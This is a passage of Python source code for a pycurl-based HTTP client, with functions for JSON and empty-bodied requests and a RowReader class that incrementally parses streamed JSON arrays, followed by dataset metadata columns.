curl.setopt(pycurl.WRITEFUNCTION, buf.write)
curl.perform()
response = buf.getvalue().decode("utf-8")
buf.close()
result = (curl.getinfo(pycurl.RESPONSE_CODE), response)
curlPool.put(curl)
return result
def jsonRequest(obj, method, url, body=None, contentType="application/x-www-form-urlencoded", rowreader=None, accept="application/json"):
if rowreader is None:
status, body = makeRequest(obj, method, url, body, accept, contentType)
if (status == 200):
if accept in ('application/json', 'text/integer', "application/x-quints+json"):
body = cjson.decode(body)
return body
else: raise RequestError(status, body)
else:
def raiseErr(status, message): raise RequestError(status, message)
makeRequest(obj, method, url, body, accept, contentType, callback=rowreader.process, errCallback=raiseErr)
def nullRequest(obj, method, url, body=None, contentType="application/x-www-form-urlencoded"):
status, body = makeRequest(obj, method, url, body, "application/json", contentType)
if (status < 200 or status > 204): raise RequestError(status, body)
class RowReader:
def __init__(self, callback):
self.hasNames = None
self.names = None
self.skipNextBracket = False
self.callback = callback
self.backlog = None
def process(self, string):
if self.hasNames is None:
self.hasNames = string[0] == "{"
if not self.hasNames: self.skipNextBracket = True
ln = len(string)
if self.backlog: string = self.backlog + string
pos = [0]
def useArray(arr):
if self.hasNames:
if self.names:
self.callback(arr, self.names)
else:
self.names = arr
self.skipNextBracket = True
else:
self.callback(arr, None)
def takeArrayAt(start):
scanned = start + 1
while True:
end = string.find("]", scanned)
if end == -1: return False
try:
useArray(cjson.decode(string[start : end + 1].decode("utf-8")))
pos[0] = end + 1
return True
except cjson.DecodeError:
scanned = end + 1
while True:
start = string.find("[", pos[0])
if self.skipNextBracket:
self.skipNextBracket = False
pos[0] = start + 1
elif start == -1 or not takeArrayAt(start):
break
if pos[0] == 0:
self.backlog = string
return ln
else:
self.backlog = None
return pos[0]
| apache-2.0 | 4,239,466,818,039,334,400 | 34.622857 | 137 | 0.569458 | false |
Subsets and Splits